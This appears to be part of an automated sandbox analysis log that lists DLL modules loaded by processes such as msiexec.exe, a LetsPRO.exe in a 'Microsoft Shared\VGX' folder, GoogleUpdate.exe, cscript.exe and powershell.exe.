Source: C:\Windows\System32\msiexec.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: textshaping.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: netapi32.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: wkscli.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: pcacli.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: aclayers.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: sfc.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: sfc_os.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: msi.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: tsappcmp.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: netapi32.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: wkscli.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: rstrtmgr.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: pcacli.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: cabinet.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: aclayers.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: sfc.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: sfc_os.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: msi.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: netapi32.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: samcli.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: netapi32.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: samcli.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: taskschd.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: samlib.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: xmllite.dll Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Section loaded: msvcr100.dll Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Section loaded: napinsp.dll Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Section loaded: pnrpnsp.dll Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Section loaded: wshbth.dll Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Section loaded: nlaapi.dll Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Section loaded: winrnr.dll Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Section loaded: dxgi.dll Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Section loaded: dinput8.dll Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Section loaded: inputhost.dll Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Section loaded: coreuicomponents.dll Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Section loaded: resourcepolicyclient.dll Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Section loaded: devenum.dll Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Section loaded: devobj.dll Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Section loaded: msdmo.dll Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Section loaded: avicap32.dll Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Section loaded: msvfw32.dll Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Section loaded: avicap32.dll Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Section loaded: msvfw32.dll Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Section loaded: avicap32.dll Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Section loaded: msvfw32.dll Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Section loaded: windowscodecs.dll Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Section loaded: msvcr100.dll Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Section loaded: msvcr100.dll Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Section loaded: msvcr100.dll Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Section loaded: msvcr100.dll Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Program Files (x86)\ChromeSetup.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Program Files (x86)\ChromeSetup.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Program Files (x86)\ChromeSetup.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Program Files (x86)\ChromeSetup.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Program Files (x86)\ChromeSetup.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Program Files (x86)\ChromeSetup.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Section loaded: msvcr100.dll Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Section loaded: msvcr100.dll Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Section loaded: msvcr100.dll Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe Section loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe Section loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe Section loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Section loaded: iphlpapi.dll
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Section loaded: msvcr100.dll
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Section loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Section loaded: uxtheme.dll
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Section loaded: iphlpapi.dll
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Section loaded: msvcr100.dll
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Section loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Section loaded: uxtheme.dll
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Section loaded: iphlpapi.dll
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Section loaded: msvcr100.dll
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Section loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Section loaded: uxtheme.dll
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Section loaded: iphlpapi.dll
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Section loaded: msvcr100.dll
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Section loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Section loaded: uxtheme.dll
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Section loaded: windows.storage.dll
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Section loaded: wldp.dll
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Section loaded: iphlpapi.dll
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Section loaded: netapi32.dll
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Section loaded: version.dll
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Section loaded: userenv.dll
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Section loaded: wtsapi32.dll
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Section loaded: msimg32.dll
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Section loaded: uxtheme.dll
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Section loaded: wininet.dll
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Section loaded: wkscli.dll
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Section loaded: netutils.dll
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Section loaded: cryptbase.dll
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Section loaded: msasn1.dll
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Section loaded: mdmregistration.dll
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Section loaded: omadmapi.dll
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Section loaded: powrprof.dll
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Section loaded: cryptsp.dll
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Section loaded: dmcmnutils.dll
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Section loaded: iri.dll
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Section loaded: umpdc.dll
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Section loaded: dsreg.dll
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Section loaded: cryptsp.dll
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Section loaded: profapi.dll
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Section loaded: cscapi.dll
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Section loaded: dbghelp.dll
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Section loaded: dbgcore.dll
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Section loaded: dbghelp.dll
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Section loaded: dbgcore.dll
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Section loaded: msxml3.dll
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Section loaded: atlthunk.dll
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Section loaded: textinputframework.dll
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Section loaded: coreuicomponents.dll
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Section loaded: coremessaging.dll
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Section loaded: ntmarta.dll
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Section loaded: coremessaging.dll
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Section loaded: wintypes.dll
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Section loaded: wintypes.dll
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Section loaded: wintypes.dll
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Section loaded: textshaping.dll
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Section loaded: taskschd.dll
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Section loaded: sspicli.dll
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Section loaded: winhttp.dll
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Section loaded: dhcpcsvc6.dll
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Section loaded: dhcpcsvc.dll
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Section loaded: webio.dll
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Section loaded: mswsock.dll
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Section loaded: winnsi.dll
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Section loaded: dnsapi.dll
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Section loaded: rasadhlp.dll
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Section loaded: schannel.dll
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Section loaded: mskeyprotect.dll
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Section loaded: ntasn1.dll
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Section loaded: ncrypt.dll
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Section loaded: ncryptsslp.dll
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Section loaded: rsaenh.dll
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Section loaded: gpapi.dll
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Section loaded: dpapi.dll
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Section loaded: propsys.dll
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Section loaded: edputil.dll
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Section loaded: urlmon.dll
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Section loaded: iertutil.dll
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Section loaded: srvcli.dll
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Section loaded: appresolver.dll
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Section loaded: bcp47langs.dll
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Section loaded: slc.dll
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Section loaded: sppc.dll
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Section loaded: iphlpapi.dll
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Section loaded: msvcr100.dll
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Section loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\cscript.exe Section loaded: version.dll
Source: C:\Windows\System32\cscript.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\cscript.exe Section loaded: sxs.dll
Source: C:\Windows\System32\cscript.exe Section loaded: vbscript.dll
Source: C:\Windows\System32\cscript.exe Section loaded: amsi.dll
Source: C:\Windows\System32\cscript.exe Section loaded: userenv.dll
Source: C:\Windows\System32\cscript.exe Section loaded: profapi.dll
Source: C:\Windows\System32\cscript.exe Section loaded: wldp.dll
Source: C:\Windows\System32\cscript.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\cscript.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\cscript.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\cscript.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\cscript.exe Section loaded: msisip.dll
Source: C:\Windows\System32\cscript.exe Section loaded: wshext.dll
Source: C:\Windows\System32\cscript.exe Section loaded: scrobj.dll
Source: C:\Windows\System32\cscript.exe Section loaded: taskschd.dll
Source: C:\Windows\System32\cscript.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\cscript.exe Section loaded: xmllite.dll
Source: C:\Windows\System32\cscript.exe Section loaded: version.dll
Source: C:\Windows\System32\cscript.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\cscript.exe Section loaded: sxs.dll
Source: C:\Windows\System32\cscript.exe Section loaded: vbscript.dll
Source: C:\Windows\System32\cscript.exe Section loaded: amsi.dll
Source: C:\Windows\System32\cscript.exe Section loaded: userenv.dll
Source: C:\Windows\System32\cscript.exe Section loaded: profapi.dll
Source: C:\Windows\System32\cscript.exe Section loaded: wldp.dll
Source: C:\Windows\System32\cscript.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\cscript.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\cscript.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\cscript.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\cscript.exe Section loaded: msisip.dll
Source: C:\Windows\System32\cscript.exe Section loaded: wshext.dll
Source: C:\Windows\System32\cscript.exe Section loaded: scrobj.dll
Source: C:\Windows\System32\cscript.exe Section loaded: taskschd.dll
Source: C:\Windows\System32\cscript.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\cscript.exe Section loaded: xmllite.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
